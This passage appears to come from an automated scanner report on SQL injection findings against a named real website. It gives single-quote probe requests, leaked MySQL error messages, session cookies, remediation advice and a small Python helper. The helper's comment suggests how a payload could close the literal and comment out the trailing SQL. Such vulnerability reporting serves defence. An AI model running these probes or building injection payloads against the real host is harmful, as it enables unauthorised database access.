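    result = {**parsed, "error_inside_input": False, "uri_in_literal": False, "trailing_sql": None}
    if not frag.startswith("'"):
        # MySQL stopped inside our own text (1.71): the injected quote closed the
        # literal early, '/mailto/' parsed as division and an identifier, and '?'
        # (a prepared-statement marker) was rejected. None of the app's SQL shows.
        result["error_inside_input"] = frag in request_uri
        return result
    rest = frag[1:]                       # drop the quote MySQL printed first
    if rest.startswith(request_uri):      # 1.69: the literal holds our whole URI
        result["uri_in_literal"] = True
        rest = rest[len(request_uri):]    # -> "' AND cookie_info=''"
        if rest.startswith("'"):
            rest = rest[1:]               # drop the application's closing quote
    # 1.66: the first quote already was the application's closing quote.
    # Either way, what is left is the SQL appended after the injected value.
    result["trailing_sql"] = rest
    return result


if __name__ == "__main__":
    for entry, (uri, message) in SAMPLES.items():
        print(entry, infer_context(message, uri))
```

For 1.66 and 1.69 the function recovers the same trailing SQL (AND cookie_info=''), which is what a payload on this host has to neutralise, for instance by closing the literal and commenting the rest out; for 1.71 it reports that the fragment is the request's own query string and says nothing about the application's SQL.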

1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.71. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the fragment MySQL quotes ('?tmpl=component&link=...') lies inside the request's own text: the injected quote closed the string literal after '/component', MySQL parsed '/mailto/' as two division operators around an identifier, and stopped at '?', which it accepts only as a prepared-statement placeholder. Nothing of the application's own SQL is visible in this message; compare the fragment in 1.69.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component'/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component''/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.72. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.71, the quoted fragment is part of the request's own query string, where MySQL stopped at '?', rather than any of the application's SQL.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/mailto'/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto''/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.73. http://www.soundingsonline.com/component/mailto/ [link parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the link parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29t' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.75. http://www.soundingsonline.com/component/mailto/ [tmpl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/mailto/?tmpl=component'&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component''&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.76. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.77. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

